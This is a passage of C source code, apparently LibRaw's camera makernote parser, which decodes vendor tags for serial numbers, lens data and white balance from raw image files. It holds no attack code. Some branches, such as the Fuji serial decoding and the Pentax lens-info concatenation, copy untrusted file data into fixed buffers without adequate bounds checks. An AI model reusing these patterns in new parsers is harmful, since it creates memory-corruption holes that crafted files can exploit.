fread (buf, 1, 10, ifp);
if (!strncmp (buf,"KDK" ,3) || /* these aren't TIFF tables */
!strncmp (buf,"VER" ,3) ||
!strncmp (buf,"IIII",4) ||
!strncmp (buf,"MMMM",4)) return;
if (!strncmp (buf,"KC" ,2) || /* Konica KD-400Z, KD-510Z */
!strncmp (buf,"MLY" ,3)) { /* Minolta DiMAGE G series */
order = 0x4d4d;
while ((i=ftell(ifp)) < data_offset && i < 16384) {
wb[0] = wb[2]; wb[2] = wb[1]; wb[1] = wb[3];
wb[3] = get2();
if (wb[1] == 256 && wb[3] == 256 &&
wb[0] > 256 && wb[0] < 640 && wb[2] > 256 && wb[2] < 640)
FORC4 cam_mul[c] = wb[c];
}
goto quit;
}
if (!strcmp (buf,"Nikon")) {
base = ftell(ifp);
order = get2();
if (get2() != 42) goto quit;
offset = get4();
fseek (ifp, offset-8, SEEK_CUR);
} else if (!strcmp (buf,"OLYMPUS") ||
!strcmp (buf,"PENTAX ")) {
base = ftell(ifp)-10;
fseek (ifp, -2, SEEK_CUR);
order = get2();
if (buf[0] == 'O') get2();
} else if (!strncmp (buf,"SONY",4) ||
!strcmp (buf,"Panasonic")) {
goto nf;
} else if (!strncmp (buf,"FUJIFILM",8)) {
base = ftell(ifp)-10;
nf: order = 0x4949;
fseek (ifp, 2, SEEK_CUR);
} else if (!strcmp (buf,"OLYMP") ||
!strcmp (buf,"LEICA") ||
!strcmp (buf,"Ricoh") ||
!strcmp (buf,"EPSON"))
fseek (ifp, -2, SEEK_CUR);
else if (!strcmp (buf,"AOC") ||
!strcmp (buf,"QVC"))
fseek (ifp, -4, SEEK_CUR);
else {
fseek (ifp, -10, SEEK_CUR);
if (!strncmp(make,"SAMSUNG",7))
base = ftell(ifp);
}
// adjust pos & base for Leica M8/M9/M Mono tags and dir in tag 0x3400
if (!strncasecmp(make, "LEICA", 5))
{
if (!strncmp(model, "M8", 2) ||
!strncasecmp(model, "Leica M8", 8) ||
!strncasecmp(model, "LEICA X", 7))
{
base = ftell(ifp)-8;
}
else if (!strncasecmp(model, "LEICA M (Typ 240)", 17))
{
base = 0;
}
else if (!strncmp(model, "M9", 2) ||
!strncasecmp(model, "Leica M9", 8) ||
!strncasecmp(model, "M Monochrom", 11) ||
!strncasecmp(model, "Leica M Monochrom", 11))
{
if (!uptag)
{
base = ftell(ifp) - 10;
fseek (ifp, 8, SEEK_CUR);
}
else if (uptag == 0x3400)
{
fseek (ifp, 10, SEEK_CUR);
base += 10;
}
}
else if (!strncasecmp(model, "LEICA T", 7))
{
base = ftell(ifp)-8;
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Leica_T;
#endif
}
#ifdef LIBRAW_LIBRARY_BUILD
else if (!strncasecmp(model, "LEICA SL", 8))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Leica_SL;
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_FF;
}
#endif
}
entries = get2();
if (entries > 1000) return;
morder = order;
while (entries--) {
order = morder;
tiff_get (base, &tag, &type, &len, &save);
tag |= uptag << 16;
#ifdef LIBRAW_LIBRARY_BUILD
INT64 _pos = ftell(ifp);
if(len > 8 && _pos+len > 2* fsize) continue;
if (!strncmp(make, "Canon",5))
{
if (tag == 0x000d && len < 256000) // camera info
{
CanonCameraInfo = (uchar*)malloc(MAX(16,len));
fread(CanonCameraInfo, len, 1, ifp);
lenCanonCameraInfo = len;
}
else if (tag == 0x10) // Canon ModelID
{
unique_id = get4();
if (unique_id == 0x03740000) unique_id = 0x80000374; // M3
if (unique_id == 0x03840000) unique_id = 0x80000384; // M10
if (unique_id == 0x03940000) unique_id = 0x80000394; // M5
setCanonBodyFeatures(unique_id);
if (lenCanonCameraInfo)
{
processCanonCameraInfo(unique_id, CanonCameraInfo,lenCanonCameraInfo);
free(CanonCameraInfo);
CanonCameraInfo = 0;
lenCanonCameraInfo = 0;
}
}
else parseCanonMakernotes (tag, type, len);
}
else if (!strncmp(make, "FUJI", 4)) {
if (tag == 0x0010) {
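// Fujifilm tag 0x0010 carries the internal serial string; long words embed a
// hex-coded body id and a YYMMDD production date, which are split out below
// and recombined into InternalBodySerial (the decoded id also lands in model2).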
char FujiSerial[sizeof(imgdata.shootinginfo.InternalBodySerial)];
char *words[4];
char yy[2], mm[3], dd[3], ystr[16], ynum[16];
int year, nwords, ynum_len;
unsigned c;
stmread(FujiSerial, len, ifp);
nwords = getwords(FujiSerial, words, 4,sizeof(imgdata.shootinginfo.InternalBodySerial));
for (int i = 0; i < nwords; i++) {
mm[2] = dd[2] = 0;
if (strnlen(words[i],sizeof(imgdata.shootinginfo.InternalBodySerial)-1) < 18)
if (i == 0)
strncpy (imgdata.shootinginfo.InternalBodySerial,
words[0],
sizeof(imgdata.shootinginfo.InternalBodySerial)-1);
else
{
char tbuf[sizeof(imgdata.shootinginfo.InternalBodySerial)];
snprintf (tbuf, sizeof(tbuf), "%s %s",
imgdata.shootinginfo.InternalBodySerial, words[i]);
strncpy(imgdata.shootinginfo.InternalBodySerial,tbuf,
sizeof(imgdata.shootinginfo.InternalBodySerial)-1);
}
else
{
strncpy (dd, words[i]+strnlen(words[i],sizeof(imgdata.shootinginfo.InternalBodySerial)-1)-14, 2);
strncpy (mm, words[i]+strnlen(words[i],sizeof(imgdata.shootinginfo.InternalBodySerial)-1)-16, 2);
strncpy (yy, words[i]+strnlen(words[i],sizeof(imgdata.shootinginfo.InternalBodySerial)-1)-18, 2);
year = (yy[0]-'0')*10 + (yy[1]-'0');
if (year <70) year += 2000; else year += 1900;
ynum_len = (int)strnlen(words[i],sizeof(imgdata.shootinginfo.InternalBodySerial)-1)-18;
strncpy(ynum, words[i], ynum_len);
ynum[ynum_len] = 0;
for ( int j = 0; ynum[j] && ynum[j+1] && sscanf(ynum+j, "%2x", &c); j += 2) ystr[j/2] = c;
ystr[ynum_len / 2 + 1] = 0;
strcpy (model2, ystr);
if (i == 0) {
char tbuf[sizeof(imgdata.shootinginfo.InternalBodySerial)];
if (nwords == 1)
snprintf (tbuf,sizeof(tbuf),
"%s %s %d:%s:%s",
words[0]+strnlen(words[0],sizeof(imgdata.shootinginfo.InternalBodySerial)-1)-12,
ystr, year, mm, dd);
else
snprintf (tbuf,sizeof(tbuf),
"%s %d:%s:%s %s",
ystr, year, mm, dd,
words[0]+strnlen(words[0],sizeof(imgdata.shootinginfo.InternalBodySerial)-1)-12);
strncpy(imgdata.shootinginfo.InternalBodySerial,tbuf,
sizeof(imgdata.shootinginfo.InternalBodySerial)-1);
} else {
char tbuf[sizeof(imgdata.shootinginfo.InternalBodySerial)];
snprintf (tbuf, sizeof(tbuf),
"%s %s %d:%s:%s %s",
imgdata.shootinginfo.InternalBodySerial, ystr, year, mm, dd,
words[i]+strnlen(words[i],sizeof(imgdata.shootinginfo.InternalBodySerial)-1)-12);
strncpy(imgdata.shootinginfo.InternalBodySerial,tbuf,
sizeof(imgdata.shootinginfo.InternalBodySerial)-1);
}
}
}
}
else
parseFujiMakernotes (tag, type);
}
else if (!strncasecmp(make, "LEICA", 5))
{
if (((tag == 0x035e) || (tag == 0x035f)) && (type == 10) && (len == 9))
{
int ind = tag == 0x035e?0:1;
for (int j=0; j < 3; j++)
FORCC imgdata.color.dng_color[ind].forwardmatrix[j][c]= getreal(type);
}
if ((tag == 0x0303) && (type != 4))
{
stmread(imgdata.lens.makernotes.Lens, len, ifp);
}
if ((tag == 0x3405) ||
(tag == 0x0310) ||
(tag == 0x34003405))
{
imgdata.lens.makernotes.LensID = get4();
imgdata.lens.makernotes.LensID =
((imgdata.lens.makernotes.LensID>>2)<<8) |
(imgdata.lens.makernotes.LensID & 0x3);
if (imgdata.lens.makernotes.LensID != -1)
{
if ((model[0] == 'M') ||
!strncasecmp (model, "LEICA M", 7))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Leica_M;
if (imgdata.lens.makernotes.LensID)
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Leica_M;
}
else if ((model[0] == 'S') ||
!strncasecmp (model, "LEICA S", 7))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Leica_S;
if (imgdata.lens.makernotes.Lens[0])
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Leica_S;
}
}
}
else if (
((tag == 0x0313) || (tag == 0x34003406)) &&
(fabs(imgdata.lens.makernotes.CurAp) < 0.17f) &&
((type == 10) || (type == 5))
)
{
imgdata.lens.makernotes.CurAp = getreal(type);
if (imgdata.lens.makernotes.CurAp > 126.3)
imgdata.lens.makernotes.CurAp = 0.0f;
}
else if (tag == 0x3400)
{
parse_makernote (base, 0x3400);
}
}
else if (!strncmp(make, "NIKON",5))
{
if (tag == 0x000a)
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
else if (tag == 0x0012)
{
char a, b, c;
a = fgetc(ifp);
b = fgetc(ifp);
c = fgetc(ifp);
if (c) imgdata.other.FlashEC = (float)(a*b)/(float)c;
}
else if (tag == 0x0082) // lens attachment
{
stmread(imgdata.lens.makernotes.Attachment, len, ifp);
}
else if (tag == 0x0083) // lens type
{
imgdata.lens.nikon.NikonLensType = fgetc(ifp);
}
else if (tag == 0x0084) // lens
{
imgdata.lens.makernotes.MinFocal = getreal(type);
imgdata.lens.makernotes.MaxFocal = getreal(type);
imgdata.lens.makernotes.MaxAp4MinFocal = getreal(type);
imgdata.lens.makernotes.MaxAp4MaxFocal = getreal(type);
}
else if (tag == 0x008b) // lens f-stops
{
uchar a, b, c;
a = fgetc(ifp);
b = fgetc(ifp);
c = fgetc(ifp);
if (c)
{
imgdata.lens.nikon.NikonLensFStops = a*b*(12/c);
imgdata.lens.makernotes.LensFStops =
(float)imgdata.lens.nikon.NikonLensFStops /12.0f;
}
}
else if (tag == 0x0093)
{
i = get2();
if ((i == 7) || (i == 9))
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
}
}
else if (tag == 0x0098) // contains lens data
{
for (i = 0; i < 4; i++)
{
NikonLensDataVersion = NikonLensDataVersion * 10 + fgetc(ifp) - '0';
}
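// The LensData payload length depends on the four-digit version just read;
// payloads from version 0201 onward are encrypted and are decoded later,
// once the serial number and the shutter-count key (tag 0xa7) are known.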
switch (NikonLensDataVersion)
{
case 100: lenNikonLensData = 9; break;
case 101:
case 201: // encrypted, starting from v.201
case 202:
case 203: lenNikonLensData = 15; break;
case 204: lenNikonLensData = 16; break;
case 400: lenNikonLensData = 459; break;
case 401: lenNikonLensData = 590; break;
case 402: lenNikonLensData = 509; break;
case 403: lenNikonLensData = 879; break;
}
if(lenNikonLensData>0)
{
table_buf = (uchar*)malloc(lenNikonLensData);
fread(table_buf, lenNikonLensData, 1, ifp);
if ((NikonLensDataVersion < 201) && lenNikonLensData)
{
processNikonLensData(table_buf, lenNikonLensData);
free(table_buf);
lenNikonLensData = 0;
}
}
}
else if (tag == 0x00a0)
{
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
}
else if (tag == 0x00a8) // contains flash data
{
for (i = 0; i < 4; i++)
{
NikonFlashInfoVersion = NikonFlashInfoVersion * 10 + fgetc(ifp) - '0';
}
}
}
else if (!strncmp(make, "OLYMPUS", 7))
{
switch (tag) {
case 0x0404:
case 0x101a:
case 0x20100101:
if (!imgdata.shootinginfo.BodySerial[0])
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
break;
case 0x20100102:
if (!imgdata.shootinginfo.InternalBodySerial[0])
stmread(imgdata.shootinginfo.InternalBodySerial, len, ifp);
break;
case 0x0207:
case 0x20100100:
{
uchar sOlyID[8];
unsigned long long OlyID;
fread (sOlyID, MIN(len,7), 1, ifp);
sOlyID[7] = 0;
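// Pack up to seven model-ID characters into a single integer so the body
// can be identified with setOlympusBodyFeatures().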
OlyID = sOlyID[0];
i = 1;
while (i < 7 && sOlyID[i])
{
OlyID = OlyID << 8 | sOlyID[i];
i++;
}
setOlympusBodyFeatures(OlyID);
}
break;
case 0x1002:
imgdata.lens.makernotes.CurAp = libraw_powf64(2.0f, getreal(type)/2);
break;
case 0x20401112:
imgdata.makernotes.olympus.OlympusCropID = get2();
break;
case 0x20401113:
FORC4 imgdata.makernotes.olympus.OlympusFrame[c] = get2();
break;
case 0x20100201:
{
unsigned long long oly_lensid [3];
oly_lensid[0] = fgetc(ifp);
fgetc(ifp);
oly_lensid[1] = fgetc(ifp);
oly_lensid[2] = fgetc(ifp);
imgdata.lens.makernotes.LensID =
(oly_lensid[0] << 16) | (oly_lensid[1] << 8) | oly_lensid[2];
}
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FT;
imgdata.lens.makernotes.LensFormat = LIBRAW_FORMAT_FT;
if (((imgdata.lens.makernotes.LensID < 0x20000) ||
(imgdata.lens.makernotes.LensID > 0x4ffff)) &&
(imgdata.lens.makernotes.LensID & 0x10))
{
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_mFT;
}
break;
case 0x20100202:
stmread(imgdata.lens.LensSerial, len, ifp);
break;
case 0x20100203:
stmread(imgdata.lens.makernotes.Lens, len, ifp);
break;
case 0x20100205:
imgdata.lens.makernotes.MaxAp4MinFocal = libraw_powf64(sqrt(2.0f), get2() / 256.0f);
break;
case 0x20100206:
imgdata.lens.makernotes.MaxAp4MaxFocal = libraw_powf64(sqrt(2.0f), get2() / 256.0f);
break;
case 0x20100207:
imgdata.lens.makernotes.MinFocal = (float)get2();
break;
case 0x20100208:
imgdata.lens.makernotes.MaxFocal = (float)get2();
if (imgdata.lens.makernotes.MaxFocal > 1000.0f)
imgdata.lens.makernotes.MaxFocal = imgdata.lens.makernotes.MinFocal;
break;
case 0x2010020a:
imgdata.lens.makernotes.MaxAp4CurFocal = libraw_powf64(sqrt(2.0f), get2() / 256.0f);
break;
case 0x20100301:
imgdata.lens.makernotes.TeleconverterID = fgetc(ifp) << 8;
fgetc(ifp);
imgdata.lens.makernotes.TeleconverterID =
imgdata.lens.makernotes.TeleconverterID | fgetc(ifp);
break;
case 0x20100303:
stmread(imgdata.lens.makernotes.Teleconverter, len, ifp);
break;
case 0x20100403:
stmread(imgdata.lens.makernotes.Attachment, len, ifp);
break;
}
}
else if ((!strncmp(make, "PENTAX", 6) || !strncmp(make, "RICOH", 5)) &&
!strncmp(model, "GR", 2))
{
if (tag == 0x0005)
{
char buffer[17];
int count=0;
fread(buffer, 16, 1, ifp);
buffer[16] = 0;
for (int i=0; i<16; i++)
{
// sprintf(imgdata.shootinginfo.InternalBodySerial+2*i, "%02x", buffer[i]);
if ((isspace(buffer[i])) ||
(buffer[i] == 0x2D) ||
(isalnum(buffer[i])))
count++;
}
if (count == 16)
{
sprintf (imgdata.shootinginfo.BodySerial, "%8s", buffer+8);
buffer[8] = 0;
sprintf (imgdata.shootinginfo.InternalBodySerial, "%8s", buffer);
}
else
{
sprintf (imgdata.shootinginfo.BodySerial, "%02x%02x%02x%02x", buffer[4], buffer[5], buffer[6], buffer[7]);
sprintf (imgdata.shootinginfo.InternalBodySerial, "%02x%02x%02x%02x", buffer[8], buffer[9], buffer[10], buffer[11]);
}
}
else if ((tag == 0x1001) && (type == 3))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_APSC;
imgdata.lens.makernotes.LensID = -1;
imgdata.lens.makernotes.FocalType = 1;
}
else if ((tag == 0x100b) && (type == 10))
{
imgdata.other.FlashEC = getreal(type);
}
else if ((tag == 0x1017) && (get2() == 2))
{
strcpy(imgdata.lens.makernotes.Attachment, "Wide-Angle Adapter");
}
else if (tag == 0x1500)
{
imgdata.lens.makernotes.CurFocal = getreal(type);
}
}
else if (!strncmp(make, "RICOH", 5) &&
strncmp(model, "PENTAX", 6))
{
if ((tag == 0x0005) && !strncmp(model, "GXR", 3))
{
char buffer[9];
buffer[8] = 0;
fread(buffer, 8, 1, ifp);
sprintf (imgdata.shootinginfo.InternalBodySerial, "%8s", buffer);
}
else if ((tag == 0x100b) && (type == 10))
{
imgdata.other.FlashEC = getreal(type);
}
else if ((tag == 0x1017) && (get2() == 2))
{
strcpy(imgdata.lens.makernotes.Attachment, "Wide-Angle Adapter");
}
else if (tag == 0x1500)
{
imgdata.lens.makernotes.CurFocal = getreal(type);
}
else if ((tag == 0x2001) && !strncmp(model, "GXR", 3))
{
short ntags, cur_tag;
fseek(ifp, 20, SEEK_CUR);
ntags = get2();
cur_tag = get2();
while (cur_tag != 0x002c)
{
fseek(ifp, 10, SEEK_CUR);
cur_tag = get2();
}
fseek(ifp, 6, SEEK_CUR);
fseek(ifp, get4()+20, SEEK_SET);
stread(imgdata.shootinginfo.BodySerial, 12, ifp);
get2();
imgdata.lens.makernotes.LensID = getc(ifp) - '0';
switch(imgdata.lens.makernotes.LensID) {
case 1:
case 2:
case 3:
case 5:
case 6:
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_RicohModule;
break;
case 8:
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Leica_M;
imgdata.lens.makernotes.CameraFormat = LIBRAW_FORMAT_APSC;
imgdata.lens.makernotes.LensID = -1;
break;
default:
imgdata.lens.makernotes.LensID = -1;
}
fseek(ifp, 17, SEEK_CUR);
stread(imgdata.lens.LensSerial, 12, ifp);
}
}
else if ((!strncmp(make, "PENTAX", 6) ||
!strncmp(model, "PENTAX", 6) ||
(!strncmp(make, "SAMSUNG", 7) && dng_version)) &&
strncmp(model, "GR", 2))
{
if (tag == 0x0005)
{
unique_id = get4();
setPentaxBodyFeatures(unique_id);
}
else if (tag == 0x0013)
{
imgdata.lens.makernotes.CurAp = (float)get2()/10.0f;
}
else if (tag == 0x0014)
{
PentaxISO(get2());
}
else if (tag == 0x001d)
{
imgdata.lens.makernotes.CurFocal = (float)get4()/100.0f;
}
else if (tag == 0x003f)
{
imgdata.lens.makernotes.LensID = fgetc(ifp) << 8 | fgetc(ifp);
}
else if (tag == 0x004d)
{
if (type == 9) imgdata.other.FlashEC = getreal(type) / 256.0f;
else imgdata.other.FlashEC = (float) ((signed short) fgetc(ifp)) / 6.0f;
}
else if (tag == 0x007e)
{
imgdata.color.linear_max[0] =
imgdata.color.linear_max[1] =
imgdata.color.linear_max[2] =
imgdata.color.linear_max[3] = (long)(-1) * get4();
}
else if (tag == 0x0207)
{
if(len < 65535) // Safety belt
PentaxLensInfo(imgdata.lens.makernotes.CamID, len);
}
else if (tag == 0x020d)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c ^ (c >> 1)] = get2();
}
else if (tag == 0x020e)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][c ^ (c >> 1)] = get2();
}
else if (tag == 0x020f)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0210)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0211)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0212)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0213)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0214)
{
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0221)
{
int nWB = get2();
if(nWB<=sizeof(imgdata.color.WBCT_Coeffs)/sizeof(imgdata.color.WBCT_Coeffs[0]))
for (int i = 0; i < nWB; i++)
{
imgdata.color.WBCT_Coeffs[i][0] = (unsigned)0xcfc6 - get2();
fseek(ifp, 2, SEEK_CUR);
imgdata.color.WBCT_Coeffs[i][1] = get2();
imgdata.color.WBCT_Coeffs[i][2] = imgdata.color.WBCT_Coeffs[i][4] = 0x2000;
imgdata.color.WBCT_Coeffs[i][3] = get2();
}
}
else if (tag == 0x0215)
{
fseek (ifp, 16, SEEK_CUR);
sprintf(imgdata.shootinginfo.InternalBodySerial, "%d", get4());
}
else if (tag == 0x0229)
{
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
}
else if (tag == 0x022d)
{
fseek (ifp,2,SEEK_CUR);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Daylight][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Shade][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Cloudy][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Tungsten][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_D][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_N][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_W][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_Flash][c ^ (c >> 1)] = get2();
getc(ifp);
FORC4 imgdata.color.WB_Coeffs[LIBRAW_WBI_FL_L][c ^ (c >> 1)] = get2();
}
else if (tag == 0x0239) // Q-series lens info (LensInfoQ)
{
char LensInfo [20];
fseek (ifp, 2, SEEK_CUR);
stread(imgdata.lens.makernotes.Lens, 30, ifp);
strcat(imgdata.lens.makernotes.Lens, " ");
stread(LensInfo, 20, ifp);
strcat(imgdata.lens.makernotes.Lens, LensInfo);
}
}
else if (!strncmp(make, "SAMSUNG", 7))
{
if (tag == 0x0002)
{
if(get4() == 0x2000)
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Samsung_NX;
}
else if (!strncmp(model, "NX mini", 7))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Samsung_NX_M;
}
else
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
}
}
else if (tag == 0x0003)
{
unique_id = imgdata.lens.makernotes.CamID = get4();
}
else if (tag == 0xa002)
{
stmread(imgdata.shootinginfo.BodySerial, len, ifp);
}
else if (tag == 0xa003)
{
imgdata.lens.makernotes.LensID = get2();
if (imgdata.lens.makernotes.LensID)
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Samsung_NX;
}
else if (tag == 0xa005)
{
stmread(imgdata.lens.InternalLensSerial, len, ifp);
}
else if (tag == 0xa019)
{
imgdata.lens.makernotes.CurAp = getreal(type);
}
else if (tag == 0xa01a)
{
imgdata.lens.makernotes.FocalLengthIn35mmFormat = get4() / 10.0f;
if (imgdata.lens.makernotes.FocalLengthIn35mmFormat < 10.0f)
imgdata.lens.makernotes.FocalLengthIn35mmFormat *= 10.0f;
}
}
else if (!strncasecmp(make, "SONY", 4) ||
!strncasecmp(make, "Konica", 6) ||
!strncasecmp(make, "Minolta", 7) ||
(!strncasecmp(make, "Hasselblad", 10) &&
(!strncasecmp(model, "Stellar", 7) ||
!strncasecmp(model, "Lunar", 5) ||
!strncasecmp(model, "Lusso", 5) ||
!strncasecmp(model, "HV",2))))
{
ushort lid;
if (tag == 0xb001) // Sony ModelID
{
unique_id = get2();
setSonyBodyFeatures(unique_id);
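// Tags 0x9050 and 0x940c may precede the ModelID tag; if their contents were
// buffered earlier, process them now that the body features (and mount) are known.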
if (table_buf_0x9050_present)
{
process_Sony_0x9050(table_buf_0x9050, unique_id);
free (table_buf_0x9050);
table_buf_0x9050_present = 0;
}
if (table_buf_0x940c_present)
{
if (imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Sony_E)
{
process_Sony_0x940c(table_buf_0x940c);
}
free (table_buf_0x940c);
table_buf_0x940c_present = 0;
}
}
else if ((tag == 0x0010) && // CameraInfo
strncasecmp(model, "DSLR-A100", 9) &&
strncasecmp(model, "NEX-5C", 6) &&
!strncasecmp(make, "SONY", 4) &&
((len == 368) || // a700
(len == 5478) || // a850, a900
(len == 5506) || // a200, a300, a350
(len == 6118) || // a230, a290, a330, a380, a390
// a450, a500, a550, a560, a580
// a33, a35, a55
// NEX3, NEX5, NEX5C, NEXC3, VG10E
(len == 15360))
)
{
table_buf = (uchar*)malloc(len);
fread(table_buf, len, 1, ifp);
if (memcmp(table_buf, "\xff\xff\xff\xff\xff\xff\xff\xff", 8) &&
memcmp(table_buf, "\x00\x00\x00\x00\x00\x00\x00\x00", 8))
{
switch (len)
{
case 368:
case 5478:
// a700, a850, a900: CameraInfo
if (table_buf[0] | table_buf[3])
imgdata.lens.makernotes.MinFocal =
bcd2dec(table_buf[0]) * 100 + bcd2dec(table_buf[3]);
if (table_buf[2] | table_buf[5])
imgdata.lens.makernotes.MaxFocal =
bcd2dec(table_buf[2]) * 100 + bcd2dec(table_buf[5]);
if (table_buf[4])
imgdata.lens.makernotes.MaxAp4MinFocal = bcd2dec(table_buf[4]) / 10.0f;
if (table_buf[7])
imgdata.lens.makernotes.MaxAp4MaxFocal = bcd2dec(table_buf[7]) / 10.0f;
parseSonyLensFeatures(table_buf[1], table_buf[6]);
break;
default:
// CameraInfo2 & 3
if (table_buf[1] | table_buf[2])
imgdata.lens.makernotes.MinFocal =
bcd2dec(table_buf[1]) * 100 + bcd2dec(table_buf[2]);
if (table_buf[3] | table_buf[4])
imgdata.lens.makernotes.MaxFocal =
bcd2dec(table_buf[3]) * 100 + bcd2dec(table_buf[4]);
if (table_buf[5])
imgdata.lens.makernotes.MaxAp4MinFocal = bcd2dec(table_buf[5]) / 10.0f;
if (table_buf[6])
imgdata.lens.makernotes.MaxAp4MaxFocal = bcd2dec(table_buf[6]) / 10.0f;
parseSonyLensFeatures(table_buf[0], table_buf[7]);
}
}
free(table_buf);
}
else if ((tag == 0x0020) && // WBInfoA100, needs 0xb028 processing
!strncasecmp(model, "DSLR-A100", 9))
{
fseek(ifp,0x49dc,SEEK_CUR);
stmread(imgdata.shootinginfo.InternalBodySerial, 12, ifp);
}
else if (tag == 0x0104)
{
imgdata.other.FlashEC = getreal(type);
}
else if (tag == 0x0105) // Teleconverter
{
imgdata.lens.makernotes.TeleconverterID = get2();
}
else if (tag == 0x0114 && len < 256000) // CameraSettings
{
table_buf = (uchar*)malloc(len);
fread(table_buf, len, 1, ifp);
switch (len) {
case 280:
case 364:
case 332:
// CameraSettings and CameraSettings2 are big endian
if (table_buf[2] | table_buf[3])
{
lid = (((ushort)table_buf[2])<<8) |
((ushort)table_buf[3]);
imgdata.lens.makernotes.CurAp =
libraw_powf64(2.0f, ((float)lid/8.0f-1.0f)/2.0f);
}
break;
case 1536:
case 2048:
// CameraSettings3 are little endian
parseSonyLensType2(table_buf[1016], table_buf[1015]);
if (imgdata.lens.makernotes.LensMount != LIBRAW_MOUNT_Canon_EF)
{
switch (table_buf[153]) {
case 16: imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Minolta_A; break;
case 17: imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sony_E; break;
}
}
break;
}
free(table_buf);
}
else if (tag == 0x9050 && len < 256000) // little endian
{
table_buf_0x9050 = (uchar*)malloc(len);
table_buf_0x9050_present = 1;
fread(table_buf_0x9050, len, 1, ifp);
if (imgdata.lens.makernotes.CamID)
{
process_Sony_0x9050(table_buf_0x9050, imgdata.lens.makernotes.CamID);
free (table_buf_0x9050);
table_buf_0x9050_present = 0;
}
}
else if (tag == 0x940c && len <256000)
{
table_buf_0x940c = (uchar*)malloc(len);
table_buf_0x940c_present = 1;
fread(table_buf_0x940c, len, 1, ifp);
if ((imgdata.lens.makernotes.CamID) &&
(imgdata.lens.makernotes.CameraMount == LIBRAW_MOUNT_Sony_E))
{
process_Sony_0x940c(table_buf_0x940c);
free(table_buf_0x940c);
table_buf_0x940c_present = 0;
}
}
else if (((tag == 0xb027) || (tag == 0x010c)) && (imgdata.lens.makernotes.LensID == -1))
{
imgdata.lens.makernotes.LensID = get4();
if ((imgdata.lens.makernotes.LensID > 0x4900) &&
(imgdata.lens.makernotes.LensID <= 0x5900))
{
imgdata.lens.makernotes.AdapterID = 0x4900;
imgdata.lens.makernotes.LensID -= imgdata.lens.makernotes.AdapterID;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Sigma_X3F;
strcpy(imgdata.lens.makernotes.Adapter, "MC-11");
}
else if ((imgdata.lens.makernotes.LensID > 0xEF00) &&
(imgdata.lens.makernotes.LensID < 0xFFFF) &&
(imgdata.lens.makernotes.LensID != 0xFF00))
{
imgdata.lens.makernotes.AdapterID = 0xEF00;
imgdata.lens.makernotes.LensID -= imgdata.lens.makernotes.AdapterID;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Canon_EF;
}
if (tag == 0x010c) imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Minolta_A;
}
else if (tag == 0xb02a && len < 256000) // Sony LensSpec
{
table_buf = (uchar*)malloc(len);
fread(table_buf, len, 1, ifp);
if (table_buf[1] | table_buf[2])
imgdata.lens.makernotes.MinFocal =
